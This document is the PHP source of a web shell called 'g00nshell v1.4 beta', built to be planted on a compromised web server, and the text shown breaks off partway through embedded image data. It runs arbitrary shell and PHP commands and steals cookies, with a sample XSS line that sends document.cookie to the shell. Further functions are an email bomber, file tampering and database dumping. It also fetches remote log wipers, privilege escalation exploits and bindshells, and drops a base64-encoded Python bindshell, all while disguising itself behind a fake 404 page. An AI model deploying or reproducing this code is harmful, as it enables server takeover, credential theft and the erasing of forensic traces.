<?

php
/*
######################################################################
# [g00n]fish presents: #
# g00nshell v1.4 beta #
############################documentation#############################
#to execute commands, simply include ?cmd=___ in the url. #
#ex: http://site.com/shl.php?cmd=whoami #
# #
#to steal cookies, use ?cookie=___ in the url. #
#ex: <script>document.location.href= #
#'http://site.com/shl.php?cookie='+document.cookies</script> #
# #
#in the ajax command shell, type 'home' to return to the shell's #
#directory. type 'clear' to clear the output screen. #
##########################verification levels#########################
#0: no protection; anyone can access #
#1: user-agent required #
#2: require ip #
#3: basic authentication #
##############################known bugs##############################
#the sql tool is not complete. there is currently no editing function#
#available. some time in the future this may be fixed, but for now #
#don't complain to me about it #
################################shouts################################
#pr0be - beta testing & css #
#trintitty - beta testing #
#clorox - beta testing #
#everyone else at g00ns.net #
########################note to administrators########################
#if this script has been found on your server without your approval, #
#it would probably be wise to delete it and check your logs. #
######################################################################
*/

// configuration
$auth = 0;
$uakey = "b5c3d0b28619de70bf5588505f4061f2"; // md5 encoded user-agent
$ip = array("127.0.0.2","127.0.0.1"); // ip addresses allowed to access shell
$email = ""; // e-mail address where cookies will be sent
$user = "af1035a85447f5aa9d21570d884b723a"; // md5 encoded user
$pass = "47e331d2b8d07465515c50cb0fad1e5a"; // md5 encoded password

// global variables
$version = '1.4 beta';
$self = $_server['php_self'];
$soft = $_server['server_software'];
$servinf = split('[:]', $_server['http_host']);
$servip = $servinf[0];
$servport = @$servinf[1] ? $servinf[1] : '80';
$cmd = @$_get['cmd'];
$act = @$_get['act'];
$cmd = @$_get['cmd'];
$curdir = cleandir(getcwd());
if(@$_get['dir']){
$dir = $_get['dir'];
if($dir != 'nullz') $dir = cleandir($dir);
}
$contents = @$_post['contents'];
$gf = @$_post['gf'];
$img = @$_get['img'];
// credits to disruptiv for this bit ;)
if(count(get_included_files()) > 1 || count(get_included_files()) > 1) list($me) =
explode("&", $_server['request_uri']);
else $me = $php_self . "?";
@session_start();
@set_time_limit(5);
switch($auth){ // authentication switcher
case 1: if(md5($_server['http_user_agent']) != $uakey) hide(); break;
case 2: if(!in_array($_server['remote_addr'],$ip)) hide(); break;
case 3: if(!$_server['php_auth_user']) userauth(); break;
default: break;
}

function cleandir($d){ // function to clean up the $dir and $curdir variables

$d = realpath($d);
$d = str_replace("\\\\", "\\", $d);
$d = str_replace("////", "//", $d);
return($d);
}

function userauth(){ // basic authentication function

global $user, $pass;
header("www-authenticate: basic realm='secure area'");
if(md5($_server['php_auth_user']) != $user || md5($_server['php_auth_pw'] !=
$pass)) hide();
}

function get_exec_function(){ // command execution method finder

$exec_functions = array("popen", "exec", "shell_exec", "system", "passthru");
$disabled_funcs = ini_get('disable_functions');
foreach($exec_functions as $f) if(strpos($disabled_funcs, $f) === false)
return $f;
}

function execute_command($exec_function, $command){ // command execution function

switch($exec_function){
case "popen": $h = popen($command, "r"); while(!feof($h)) echo(fgets($h));
break;
case "exec": exec($command, $result); foreach($result as $r) echo($r .
"\n"); break;
case "shell_exec": echo(shell_exec($command)); break;
case "system": system($command); break;
case "passthru": passthru($command); break;
}
}

if(!$act && !$cmd && !@$_get['cookie'] && !@$_get['f'] && !@$dir && !$gf && !$img
&& !@$_get['ajxcmd']) main();

elseif(!$act && $cmd){ // raw command execution

style();
echo("<b>results:</b>\n<br><textarea rows=20 cols=100>");
if($exec_function = get_exec_function()) execute_command($exec_function,
$cmd);
else die("all execution methods disabled.</textarea>");
 echo("</textarea>");
}
elseif(@$_get['ajxcmd']){ // command execution for ajax shell
if($_get['ajxcmd'] == "home") $_session['work_dir'] = getcwd();
elseif($exec_function = get_exec_function()){
if(strpos($_get['ajxcmd'], 'cd') === 0){
$c = array_pop(explode(" ", $_get['ajxcmd']));
if(@is_dir($_session['work_dir'] . directory_separator . $c) &&
$c[0] != '\\' && $c[0] != '//') $_session['work_dir'] .= directory_separator . $c;
elseif(@is_dir($c) && $c[0] != '.') $_session['work_dir'] = $c;
else echo("invalid directory\n");
}
else{
@chdir($_session['work_dir']);
execute_command($exec_function, $_get['ajxcmd']);
}
}
else die("all execution methods disabled.");
}
elseif(@$_get['cookie']){@mail($email, "cookie data", @$_get['cookie'], "from:
$email"); hide();} // cookie stealer function
elseif($act == 'view' && @$_get['f'] && $dir) view($_get['f'], $dir);
elseif($img) img($img);
elseif($gf) grab($gf);
elseif(@$dir) files($dir);
else{
switch($act){
case 'phpinfo': phpinfo();break;
case 'sql': sql();break;
case 'files': files(@$dir);break;
case 'email': email();break;
case 'cmd': cmd();break;
case 'upload': upload();break;
case 'tools': tools();break;
case 'sqllogin': sqllogin();break;
case 'sql': sql();break;
case 'lookup': lookup();break;
case 'kill': kill();break;
case 'phpexec': execphp();break;
case 'bshell': bshell();break;
default: main();break;
}
}

function hide(){ // hiding function

global $self, $soft, $servip, $servport;
header("http/1.0 404 not found");
?>
<!doctype html public '-//ietf//dtd html 2.0//en'>
<html><head>
<title>404 not found</title>
</head><body>
<h1>not found</h1>
the requested url <?php echo($self); ?> was not found on this server.<p>
<p>additionally, a 404 not found
error was encountered while trying to use an errordocument to handle the request.
<hr>
<address><?php echo($soft . "server at " . $servip . " port " . $servport); ?
></address>
</body></html>
<?php
die();
}

function style(){ // style / header function

global $servip,$version;
?>
<html>
<head>
<title>g00nshell v.<?php echo($version . "-" . $servip); ?></title>
<style>
body { background-color:#000000; color:white; font-family:verdana; font-size:11px;
}
h1,h3 { color:white; font-family:verdana; font-size:11px; }
input,textarea,select,button { color:#ffffff; background-color:#000000; border:1px
solid #4f4f4f; font-family:verdana; font-size:11px; }
textarea { font-family:courier; }
a { color:#6f6f6f; text-decoration:none; font-family:verdana; font-size:11px; }
a:hover { color:#7f7f7f; }
td { font-size:12px; vertical-align:middle; }
th { font-size:13px; vertical-align:middle; }
table { empty-cells:show; }
.inf { color:#7f7f7f; }
</style>
</head>
<?php
}

function main(){ // main/menu function

global $me, $self, $servip, $servport, $soft, $version;
style();
$act = array('cmd'=>'command execute','files'=>'file view','phpinfo'=>'php
info', 'phpexec'=>'php execute',
'tools'=>'tools','sqllogin'=>'sql','upload'=>'get files','kill'=>'kill
shell');
$capt = array_flip($act);
echo("<form method='get' name='shell'>\n");
echo("<b>host: <span class='inf'>$servip</span></b><br>\n");
echo("<b>server software: <span class='inf'>$soft</span></b><br>\n");
echo("<b>uname: <span class='inf'>" . php_uname() . "</span></b><br>\n");
echo("<b>shell directory: <span class='inf'>" . getcwd() .
"</span></b><br>\n");
echo("<div style='display:none' id='info'>\n");
echo("<b>current user: <span class='inf'>" . @exec('whoami').
"</span></b><br>\n");
echo("<b>id: <span class='inf'>" . @exec('id') . "</span></b><br>\n");
echo("<b>safemode: " . (@ini_get('safe_mode') ? "<font color='red'>on</font>"
: "<font color='green'>off</font><br>\n") . "</b>");
echo("<b>open base dir: " . (@ini_get('open_basedir') != '' ? "[ <span
class='inf'>" . ini_get('open_basedir') . "</span> ]" : "<font
color='green'>off</font>") . "</b><br>\n");
echo("<b>disabled functions: <span class='inf'>" .
(@ini_get('disable_functions') != '' ? @ini_get('disable_functions') : "none") .
"</span></b><br>\n");
echo("<b>mysql: " . (@function_exists(mysql_connect) ? "<font
color='green'>on</font>" : "<font color='red'>off</font>") . "</b>");
?>
</div>
<a href="#" onclick="document.getelementbyid('info').style.display =
'block';">more</a>
<a href="#" onclick="document.getelementbyid('info').style.display =
'none';">less</a>
<center>
<h3 align='center'>links</h3>
<?php
foreach($act as $link) echo("[ <a href='" . $me . "&act=" . $capt[$link] . "'
target='frm'>" . $link . "</a> ] "); ?>
</center>
<hr>
<br><iframe name='frm' style='width:100%; height:65%; border:0;' src='<?php
echo($me . "&act=files"); ?>'></iframe>
<pre style='text-align:center'>:: g00nshell <font color='red'>v<?php
echo($version); ?></font> ::</pre>
<?php
die();
}

function cmd(){ // command execution function

global $me;
style();
?>
<script>
var http = null;
function char(e){
if(window.event) k = e.keycode;
else if(e.which) k = e.which;
if(k == 13){
cmd = document.getelementbyid('c').value;
if(cmd == "clear") document.getelementbyid('history').value = "";
else if(document.getelementbyid('c').value != "") exec(cmd);
document.getelementbyid('c').value = "";
}
}
function exec(cmd){
if (window.xmlhttprequest) http = new xmlhttprequest();
else if (window.activexobject) http = new activexobject("microsoft.xmlhttp");
if(http){
http.onreadystatechange = handle_response;
http.open("get", "<?php echo($me . "&ajxcmd="); ?>" + cmd, true);
http.send(null);
}
else alert("your browser fails.");
}
function handle_response(){
if(http.readystate == 4) document.getelementbyid('history').value += "# " +
cmd + "\n" + http.responsetext;
document.getelementbyid('history').scrolltop =
document.getelementbyid('history').scrollheight;
}
</script>
</head>
<body onload="document.getelementbyid('c').focus();
document.getelementbyid('history').scrolltop =
document.getelementbyid('history').scrollheight;">
<input type="text" id="c" onkeydown="char(event);" style="width:100%; border:1px
solid #1f1f1f;"><br><textarea id="history" style="width:100%; height:90%;
border:0px; overflow: auto;"></textarea>
</body></html>
<?php
}

function execphp(){ // php code execution function

style();
echo("<h4>execute php code</h4>");
echo("<form method='post'>");
echo("<textarea name='phpexec' rows=5 cols=100>");
if(!@$_post['phpexec']) echo("/*don't include <? ?> tags*/\n");
echo(stripslashes(htmlentities(@$_post['phpexec'])) . "</textarea>\n<br>\n");
echo("<input type='submit' value='execute'>");
echo("</form>");
if(@$_post['phpexec']){
echo("<textarea rows=10 cols=100>");
eval(stripslashes($_post['phpexec']));
echo("</textarea>");
}
}

function sqllogin(){ // mysql login function

global $me;
if(@$_session['isloggedin'] == "true")
header("location: " . $me . "&act=sql");
if(@$_post['un'] && @$_post['pw'])
header("location: " . $me . "&act=sql");
style();
?>
<form method='post'>
user:<br><input type='text' name='un' size='30'><br>
password:<br><input type='text' name='pw' size='30'><br>
host:<br><input type='text' name='host' size='30' value='localhost'><br>
port:<br><input type='text' name='port' size='30' value='3306'><br>
<input type='submit' value='login'>
</form>
<?php
die();
}

function sql(){ // general sql function

global $me;
if(!@$_get['sqlf']){style();}
if(@$_post['un'] && $_post['pw']){;
$_session['sql_user'] = $_post['un'];
$_session['sql_password'] = $_post['pw'];
}
$_session['sql_host'] = @$_post['host'] ? $_post['host'] : 'localhost';
$_session['sql_port'] = @$_post['port'] ? $_post['port'] : '3306';

if(@$_session['sql_user'] && @$_session['sql_password']){

if(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' .
$_session['sql_port'], $_session['sql_user'], $_session['sql_password']))){
unset($_session['sql_user'], $_session['sql_password'],
$_session['sql_host'], $_session['sql_port']);
echo("invalid credentials<br>\n");
 die(sqllogin());
}
else
$_session['isloggedin'] = "true";
}
else
die(sqllogin());

if (@$_get['db']){
mysql_select_db($_get['db'], $sqlcon);
if(@$_get['sqlquery']){
$dat = mysql_query($_get['sqlquery'], $sqlcon) or die(mysql_error());
$num = mysql_num_rows($dat);
for($i=0;$i<$num;$i++)
echo(mysql_result($dat, $i) . "<br>\n");
}
else if(@$_get['table'] && !@$_get['sqlf']){
echo("<a href='" . $me . "&act=sql&db=" . $_get['db'] . "&table=" .
$_get['table'] . "&sqlf=ins" . "'>insert row</a><br><br>\n");
echo("<table border='1'>");
$query = "show columns from " . $_get['table'];
$result = mysql_query($query, $sqlcon) or die(mysql_error());
$i = 0;
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields, $row['field']);
echo("<th>" . $fields[$i]);
$i++;
}
$result = mysql_query("select * from " . $_get['table'], $sqlcon) or
die(mysql_error());
$num_rows = mysql_num_rows($result) or die(mysql_error());
$y=0;
for($x=1;$x<=$num_rows+1;$x++){
if(!@$_get['p'])
$_get['p'] = 1;
if(@$_get['p']){
if($y > (30*($_get['p']-1)) && $y <= 30*($_get['p'])){
echo("<tr>");
for($i=0;$i<count($fields);$i++){
$query = "select " . $fields[$i] . " from " .
$_get['table'] . " where " . $fields[0] . " = '" . $x . "'";
$dat = mysql_query($query, $sqlcon) or
die(mysql_error());
while($row = mysql_fetch_row($dat))
echo("<td>" . $row[0] . "</td>");
}
echo("</tr>\n");
}
}
$y++;
}
echo("</table>\n");
for($z=1;$z<=ceil($num_rows / 30);$z++){
echo("<a href='" . $me . "act=sql&db=" . $_get['db'] . "&table=" .
$_get['table'] . "&p=" . $z . "'>" . $z . "</a> | ");
}
}
 elseif(@$_get['table'] && @$_get['sqlf']){
switch($_get['sqlf']){
case "dl": sqldownload();break;
case "ins": sqlinsert();break;
default: $_get['sqlf'] = "";
}
}
else{
echo("<table>");
$query = "show tables from " . $_get['db'];
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while ($row = mysql_fetch_row($dat))
echo("<tr><td><a href='" . $me . "&act=sql&db=" . $_get['db'] .
"&table=" . $row[0] . "'>" . $row[0] . "</a></td><td>[<a href='" . $me .
"&act=sql&db=" . $_get['db'] . "&table=" . $row[0] ."&sqlf=dl" .
"'>download</a>]</td></tr>\n");
echo("</table>");
}
}
else{
$dbs=mysql_list_dbs($sqlcon);
while($row = mysql_fetch_object($dbs))
echo("<a href='" . $me . "&act=sql&db=" . $row->database . "'>" .
$row->database . "</a><br>\n");
}
mysql_close($sqlcon);
}

function sqldownload(){ // download sql file function

$sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_port'],
$_session['sql_user'], $_session['sql_password']);
mysql_select_db($_get['db'], $sqlcon);
$query = "show columns from " . $_get['table'];
$result = mysql_query($query, $sqlcon) or die(mysql_error());
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields, $row['field']);
$i++;
}
$result = mysql_query("select * from " . $_get['table'], $sqlcon) or
die(mysql_error());
$num_rows = mysql_num_rows($result) or die(mysql_error());
for($x=1;$x<$num_rows;$x++){
$out .= "(";
for($i=0;$i<count($fields);$i++){
$out .= "'";
$query = "select " . $fields[$i] . " from " . $_get['table'] . " where
" . $fields[0] . " = '" . $x . "'";
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while($row = mysql_fetch_row($dat)){
if($row[0] == "")
$row[0] = "null";
if($i != count($fields)-1)
$out .= str_replace("\r\n", "\\r\\n", $row[0]) . "', ";
else
$out .= $row[0]. "'";
}
}
 $out .= ");\n";
}
$filename = @$_get['table'] . '-' . time() . '.sql';
header("content-type: application/octet-stream");
header("content-length: " . strlen($out));
header("content-disposition: attachment; filename=$filename;");
echo($out);
die();
}

function sqlinsert(){
style();
$sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_port'],
$_session['sql_user'], $_session['sql_password']);
mysql_select_db($_get['db'], $sqlcon);
if(@$_post['ins']){
unset($_post['ins']);
$fields = array_flip($_post);
print_r($_post);
$f = implode(",", $fields);
$v = implode("','", $_post);
$query = "insert into " . $_get['table'] . " (" . $f . ") values ('" . $v
. "')";
echo($query);
mysql_query($query, $sqlcon) or die("mysql error: " . mysql_error());
die("row inserted.<br>\n<a href='" . $me . "&act=sql&db=" . $_get['db'] .
"&table=" . $_get['table'] . "'>go back</a>");
}
$query = "show columns from " . @$_get['table'];
$result = mysql_query($query, $sqlcon) or die("mysql error: " .
mysql_error());
$i = 0;
$fields = array();
echo("<form method='post'>");
echo("<table>");
while($row = mysql_fetch_assoc($result)){
array_push($fields, $row['field']);
echo("<tr><td><b>" . $fields[$i] . "</b><td><input type='text' name='" .
$fields[$i] . "'><br>\n");
$i++;
}
echo("</table>");
echo("<br>\n<input type='submit' value='insert' name='ins'>");
echo("</form>");
}

function nicesize($size){
if(!$size) return "0 b";
if ($size >= 1073741824) return(round($size / 1073741824) . " gb");
elseif ($size >= 1048576) return(round($size / 1048576) . " mb");
elseif ($size >= 1024) return(round($size / 1024) . " kb");
else return($size . " b");
}

function files($dir){ // file manipulator function

global $me, $self, $curdir;
style();
if($dir=="") $dir = $curdir;
 $dirx = explode(directory_separator, $dir);
$files = array();
$folders = array();
echo("<form method='get'>");
echo("<input type='text' name='dir' value='$dir' size='40'>");
echo("<input type='submit' value='go'>");
echo("</form>");
echo("<h4>file list for ");
for($i=0;$i<count($dirx);$i++){
@$totalpath .= $dirx[$i] . directory_separator;
echo("<a href='" . $me . "&dir=$totalpath" . "'>$dirx[$i]</a>" .
directory_separator);
}
echo("</h4>");
echo("<table>");
echo("<th>file name<th>file size</th>");
if ($handle = opendir($dir)) {
while (false != ($link = readdir($handle))) {
if (@is_dir($dir . directory_separator . $link)){
$file = array();
$color = @is_writable($dir . directory_separator . $link) ?
"forestgreen" : (is_readable($dir . directory_separator . $link) ? "gold" :
"red");
@$file['link'] = "<a href='$me&dir=$dir" . directory_separator .
"$link'><font color='$color'>$link</font></a>";
@$file['icon'] = "folder";
$folder = "<img src='" . $me . "&img=" . $file['icon'] .
"'>&nbsp;". $file['link'];
array_push($folders, $folder);
}
else{
$file = array();
$ext = strpos($link, ".") ? strtolower(end(explode(".", $link))) :
"";
$file['size'] = nicesize(@filesize($dir . directory_separator .
$link));
$color = @is_writable($dir . directory_separator . $link) ?
"forestgreen" : (is_readable($dir . directory_separator . $link) ? "gold" :
"red");
@$file['link'] = "<a href='$me&act=view&f=$link&dir=$dir'><font
color='$color'>$link</font></a>";
switch($ext){
case 'exe': case 'com': case 'jar': case '':
$file['icon']='binary'; break;
case 'jpg': case 'gif': case 'png': case 'bmp':
$file['icon']='image'; break;
case 'zip': case 'tar': case 'rar': case 'gz': case 'cab':
case 'bz2': case 'gzip': $file['icon']='compressed'; break;
case 'txt': case 'doc': case 'pdf': case 'htm': case 'html':
case 'rtf': $file['icon']='text'; break;
case 'wav': case 'mp3': case 'mp4': case 'wma':
$file['icon']='sound'; break;
case 'js': case 'vbs': case 'c': case 'h': case 'sh': case
'pl': case 'py': case 'php': case 'h': $file['icon']='script'; break;
default: $file['icon'] = 'unknown'; break;
}
$file = "<tr><td><img src='" . $me . "&img=" . $file['icon'] . "'
height='18' width='18'>&nbsp;". $file['link'] . "<td>" . $file['size'] .
"</td></tr>\n";
array_push($files, $file);
}
}
foreach($folders as $folder)
echo("<tr><td>$folder</td><td>dir</td></tr>\n");
foreach($files as $file) echo($file);
echo("</table>");
closedir($handle);
}
}

function email(){ // email bomber function

global $me;
style();
?>
<form method='post' action='<?php echo("$me&act=email"); ?>'>
<b>your address:</b><br>
<input name='from' type='text' size='35'><br>
<b>their address:</b><br>
<input name='to' type='text' size='35'><br>
<b>subject:</b><br>
<input name='subject' type='text' size='35'><br>
<b>text:</b><br>
<input name='body' type='text' size='35'><br>
<b>how many times:</b><br>
<input name='times' type='text' size='5'><br><br>
<input name='submit' type='submit' value='submit'>
</form>
<?php
if (@$_post['to'] && @$_post['from']){
$headers = "from: " . $_post['from'];
for($i=0; $i<@$_post['times']; $i++){
@mail(@$_post['to'], @$_post['subject'], @$_post['body'], $headers) or
die("mail could not be sent");
}
echo("mail sent");
}
}

function view($filename, $dir){ // file view function

global $me;
if(@$_post['fileact'] == "download"){
header("content-type: application/octet-stream");
header("content-length: " . strlen($_post['contents']));
header("content-disposition: attachment; filename=" . basename($filename)
. ";");
$handle = @fopen($filename, "r");
echo(@fread($handle, filesize($filename)));
die();
}
style();
if(@$_post['contents'] && @$_post['fileact'] == "save"){
$handle = @fopen($filename, 'w');
fwrite($handle, stripslashes($_post['contents']));
fclose($handle);
echo("saved file.<br><br>");
echo("<a href='$me&act=view&f=$filename&dir=nullz'>go back</a>");
 die();
}
elseif(@$_post['fileact'] == "delete"){
unlink($filename);
echo("deleted file.<br><br>");
echo("<a href='$me&act=files'>go back</a>");
die();
}

if($dir != "nullz") $filename = $dir . directory_separator . $filename; // heh

$file = @fopen($filename, 'r');
$content = @fread($file, @filesize($filename));
echo("<form name='file' method='post'
action='$me&act=view&dir=$dir&f=$filename'>");
echo("<textarea style='width:100%; height:92%;' name='contents'>");
echo(htmlentities($content) . "\n");
?>
</textarea>
<input name='fileact' type='submit' value='save'>
<input name='fileact' type='submit' value='delete'>
<input name='fileact' type='submit' value='download'>
</form>
<?php
}

function upload(){ // uploading frontend function

global $curdir;
style();
?>
<form name='files' enctype='multipart/form-data' method='post'>
<b>output directory</b><br>
<input type='text' name='loc' size='65' value='<?php echo($curdir); ?>'><br><br>
<b>remote upload</b><br>
<input type='text' name='rem' size='65'>
<input type='submit' value='grab'><br><br>
<b>local file upload</b><br>
<input name='up' type='file' size='65'>
<input type='submit' value='upload'>
</form><br>
<?php
if(@$_post['rem']) grab($_post['rem']);
if(@$_files['up']) up($_files['up']);
}

function up($up){ // uploading backend funciton

style();
$updir = @$_post['loc'];
move_uploaded_file($up['tmp_name'], $updir . directory_separator .
$up['name']);
die("file has been uploaded.");
}

function grab($file){ // uploading backend function

style();
$updir = @$_post['loc'];
$filex = array_pop(explode(directory_separator, $file));
if(exec("wget $file -b -o $updir" . directory_separator . $filex)) die("file
has been uploaded.");
 else die("file upload failed.");
}

function tools(){ // useful tools function

global $me, $curdir;
style();
$tools = array(
"--- log wipers ---"=>"1",
"vanish2.tgz"=>"http://packetstormsecurity.org/unix/penetration/log-
wipers/vanish2.tgz",
"cloak.c"=>"http://packetstormsecurity.org/unix/penetration/log-
wipers/cloak.c",
"gh0st.sh"=>"http://packetstormsecurity.org/unix/penetration/log-
wipers/gh0st.sh",
"--- priv escalation ---"=>"2",
"h00lyshit - linux 2.6 all"=>"http://someshit.net/files/xpl/h00lyshit",
"k-rad3 - linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3",
"raptor - linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor",
"rootbsd - bsd v?"=>"http://someshit.net/files/xpl/rootbsd",
"--- bindshells ---"=>"3",
"thc rwwwshell-
1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl",
"basic perl
bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bindshell-unix",
"--- misc ---"=>"4",
"mocks socks4 proxy"=>"http://superb-
east.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz",
"xps.c (proc
hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c");
$names = array_flip($tools);
echo("<form method='post'>");
echo("<b>output directory</b><br>");
echo("<input type='text' name='loc' size='65' value='$curdir'><br><br>");
echo("<select name='gf' style='align:center;'>");
foreach($tools as $tool)
echo(is_numeric($tool) ? "<optgroup label='$names[$tool]'>\n" : "<option
value='$tool'>$names[$tool]</option>\n");
echo("</select>");
echo("<br><input type='submit' value='grab'>");
echo("</form>");
echo("<br>");
echo("<a href=$me&act=bshell>bindshell</a> (requires writable
directory)<br>\n");
echo("<a href=$me&act=lookup>list domains</a> (requires writable
directory)<br>\n");
echo("<a href=$me&act=email>e-mail bomber</a><br>\n");
}

function lookup(){ // domain lookup function

global $servinf;
style();
$script = "import urllib, urllib2, sys, re
req = urllib2.request('http://www.seologs.com/ip-domains.html',
urllib.urlencode({'domainname' : sys.argv[1]}))
site = re.findall('.+\) (.+)<br>', urllib2.urlopen(req).read())
for i in xrange(0,len(site)): print site[i]"; // my sexy python script
$handle = fopen('lookup.py', 'w');
@fwrite($handle, $script);
 @fclose($handle);
echo("<h4>domains</h4>");
echo("<ul>");
$cmd = exec("python lookup.py $servinf[0]", $ret);
foreach($ret as $site) echo("<li>$site\n");
echo("</ul>");
@unlink('lookup.py');
}

function bshell(){ // python bindshell script

style();
if(!@$_post['bport']){ ?>
<form method = post>
<b>port: </b>
<input type = 'text' name = 'bport' value = '5001'>
<input type = 'submit' value = 'bind'>
</form>
<?php
die();
}
$script =
"iyevdxnyl2jpbi9lbnyvchl0ag9udqppbxbvcnqgc3lzlhnvy2tldcxvcw0kzgvmigjpbmrtzshwb3j0k
tonciagcy
a9ihnvy2tldc5zb2nrzxqoc29ja2v0lkfgx0lorvqsihnvy2tldc5tt0nlx1nuukvbtsknciagdhj5
og0kicagihmuymluzcgojyc
saw50khbvcnqpksknciagicbzlmxpc3rlbig1kq0kicblegnlchq6dqogicagc3lzlmv4axqoj0nhb
m5vdcbjcmvhdgugc29ja2v0
jyknciagdw4gpsbvcy5lbnzpcm9uwyjmt0doqu1fil0nciagawygdw4gpt0gj3jvb3qnoibwcm9tch
q9jyajiccnciagzwxzztogc
hjvbxb0pscgjcandqogihdoawxlifrydwu6dqogicagyywgzgv0ywlscya9ihmuywnjzxb0kckncia
gicbjlnnlbmqoildlbgnvbw
ugdg8gdghlihnlcnzlcia7kvxuu2hlbgwga2lsbcbjb21tyw5kiglzicdkawunllxuiiknciagicb3
aglszsbucnvlog0kicagica
gdhj5og0kicagicagicbjlnnlbmqodw4gkyanqccgkybzb2nrzxquz2v0ag9zdg5hbwuoksariccgj
yarig9zlmdldgn3zcgpicsg
chjvbxb0kq0kicagicagicbkyxqgpsbjlnjly3yonda5nikucnn0cmlwkcknciagicagicagawygzg
f0wza6ml0gpt0gj2nkjzonc
iagicagicagicbvcy5jagrpcihkyxrbmzpdkq0kicagicagicbpzibkyxrbmdozxsa9psanzglljzo
nciagicagicagicbvcy5wb3
blbigna2lsbcanicsgc3rykg9zlmdldhbpzcgpksknciagicagicagyy5zzw5kkg9zlnbvcgvukgrh
dckucmvhzcgplnjzdhjpccg
picsgj1xujyknciagicagigv4y2vwdcbzb2nrzxquzxjyb3i6dqogicagicagihmuy2xvc2uokq0ki
cagicagicbiaw5kbwuocg9y
dcknciagicbjlmnsb3nlkckncmlmig9zlmzvcmsoktonciagc3lzlmv4axqomckncmjpbmrtzshpbn
qoc3lzlmfyz3zbmv0pkq==";
$handle = fopen('b.py', 'w');
@fwrite($handle, base64_decode($script));
@fclose($handle);
exec("python b.py " + $_post['bport']);
@unlink("b.py");
}

function img($img){ // images function

$images = array(
"folder"=>"r0lgodlhewaqalmaaaaaap///5ycam7oy///np//zv/onpf39////waaaaaaaaaaaaa
aaaaaaaaaaaaaach5baeaaa" .
"galaaaaaatabaaaarremljq7046yp6bxsihevbeakycuprdp7hlxrdeomqcebp/4ychffzgqhh4yr
ypb2dolhpikwq" .
 "d1pq8yrvvg3qyeh5ryk5rjfafuua3vb4fbibads=",
"image"=>"r0lgodlhfaawaomaap////8zm8z//8zmzjmzmwzmzmyaadmzmwczzaczmwazzgaaaaaa
aaaaaaaaaaaaach+tlroax" .
"mgyxj0iglzigluihrozsbwdwjsawmgzg9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29
tlcbtzxb0zw1i" .
"zxigmtk5nqah+qqbaaacacwaaaaafaawaaaekpdisae4wbzau99hdm1esyyzwxyqogjblacdonryn
ssgsby/4gsx6y" .
"2oymwq2omqngslbjzlwbm1afsqkyu4a2twywumyt/wltsivgyga/zq3qwu7mmhvh4g8gusfauhch9
5nwmhv4sgh4ed" .
"ihoojy8rzpsveiv+mycwhncko6sfm5cliadqrk1pqbljsrnseqa7",
"unknown"=>"r0lgodlhfaawamiaap///8z//5mzmtmzmwaaaaaaaaaaaaaaach+tlroaxmgyxj0ig
lzigluihrozsbwdwjsawmgzg" .
"9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29tlcbtzxb0zw1izxigmtk5nqah+qqbaaa
bacwaaaaafaaw" .
"aaadadi6vpewdecrnso+atvpeqciamgairhr5xmkgmq1lkomn7ecrjdwp52r0ippjj0kjuaq7sxle
+si+9v8vycfim" .
"0ilb2o80s8jcfvjjtagyrzypnby5ov6wolpd+xdjqagsq4eucgqqejads=",
"binary"=>"r0lgodlhfaawamiaap///8z//8zmzjmzmtmzmwaaaaaaaaaaach+tlroaxmgyxj0igl
zigluihrozsbwdwjsawmgzg" .
"9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29tlcbtzxb0zw1izxigmtk5nqah+qqbaaa
bacwaaaaafaaw" .
"aaadaui6vpeweecrnss+wqoqxseae6lxxgeopqmha+q1rhtfakho/hadnvfo6lmykypkooadim4vj
dowkx2xvirugq" .
"vavcbuxcn0hke04znriv/roovag3+z63oyo6/uiwlkgyjjoxfdh4htcqa7",
"text"=>"r0lgodlhfaawaomaap/////mm/8zm8z//5mzmzlmm2bm/zmzmwaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaach+tlroax" .
"mgyxj0iglzigluihrozsbwdwjsawmgzg9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29
tlcbtzxb0zw1i" .
"zxigmtk5nqah+qqbaaadacwaaaaafaawaaaeb/disee4ebzau99hdm1esybzwxekgi5sebg0+2hnt
bsccvhamgtxay" .
"cositwugg2pyqoqalhoz/qklvv6gkmqm8xxdumzx0yv5ze9s7jdpgtl3me5jhhts/xo3hwdwt0f31
7wwdsi4xrpxlw" .
"kugxeqa7",
"compressed"=>"r0lgodlhfaawaocaap//////zp//mf//zv//m///ap/m///mzp/mmf/mzv/mm//
map+z//+zzp+zmf+zzv+zm/+zap" .
"9m//9mzp9mmf9mzv9mm/9map8z//8zzp8zmf8zzv8zm/8zap8a//8azp8amf8azv8am/8aamz//8z
/zmz/mcz/zsz/" .
"m8z/amzm/8zmzmzmmczmzszmm8zmamyz/8yzzmyzmcyzzsyzm8yzamxm/8xmzmxmmcxmzsxmm8xma
mwz/8wzzmwzmc" .
"wzzswzm8wzamwa/8wazmwamcwazswam8waajn//5n/zjn/mzn/zpn/m5n/ajnm/5nmzjnmmznmzpn
mm5nmajmz/5mz" .
"zjmzmzmzzpmzm5mzajlm/5lmzjlmmzlmzplmm5lmajkz/5kzzjkzmzkzzpkzm5kzajka/5kazjkam
zkazpkam5kaag" .
"b//2b/zgb/mwb/zmb/m2b/agbm/2bmzgbmmwbmzmbmm2bmagaz/2azzgazmwazzmazm2azagzm/2z
mzgzmmwzmzmzm" .
"m2zmagyz/2yzzgyzmwyzzmyzm2yzagya/2yazgyamwyazmyam2yaadp//zp/zdp/mtp/zjp/mzp/a
dpm/zpmzdpmmt" .
"pmzjpmmzpmadoz/zozzdozmtozzjozmzozadnm/znmzdnmmtnmzjnmmznmadmz/zmzzdmzmtmzzjm
zmzmzadma/zma" .
